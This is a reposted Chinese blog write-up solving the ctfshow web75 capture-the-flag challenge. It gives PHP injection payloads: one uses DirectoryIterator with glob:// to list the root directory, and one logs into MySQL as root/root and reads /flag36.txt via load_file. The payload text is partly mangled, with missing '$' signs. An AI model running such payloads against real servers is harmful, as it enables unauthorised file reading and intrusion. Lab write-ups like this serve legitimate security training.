目录

ctfshow web75

开启环境:

先直接用伪协议获取 flag 位置

c=?><?php a=new DirectoryIterator("glob:///\*"); foreach(a as f) {echo(f->__toString().' ');} exit(0); ?>

c=try {dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach(dbh->query('select load_file("/flag36.txt")') as row){echo(row[0])."|"; }dbh = null;}catch (PDOException e) {echo $e->getMessage();exit(0);}exit(0);

try {

创建 PDO 实例, 连接 MySQL 数据库

$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');

在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。

foreach(dbh-\>query('select load_file("/flag36.txt")') as row) {

echo($row[0])."|";

}

$dbh = null;

}

catch (PDOException $e) {

echo $e->getMessage();exit(0);

}

exit(0);

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
Gracker2 分钟前
Android Weekly #202513
android
张拭心2 小时前
工作九年程序员的三月小结
android·前端
每次的天空2 小时前
Flutter学习总结之Android渲染对比
android·学习·flutter
tjsoft3 小时前
实操日志之Windows Server2008R2 IIS7 配置Php7.4.3
windows·iis·php·2008·7.4.3
鸿蒙布道师4 小时前
鸿蒙NEXT开发土司工具类(ArkTs)
android·ios·华为·harmonyos·arkts·鸿蒙系统·huawei
智想天开5 小时前
11.使用依赖注入容器实现松耦合
android
yunteng5216 小时前
音视频(四)android编译
android·ffmpeg·音视频·x264·x265
tangweiguo030519876 小时前
(kotlin) Android 13 高版本 图片选择、显示与裁剪功能实现
android·开发语言·kotlin
匹马夕阳6 小时前
(一)前端程序员转安卓开发分析和规划建议
android·前端
Kika写代码6 小时前
【Android】UI开发:XML布局与Jetpack Compose的全面对比指南
android·xml·ui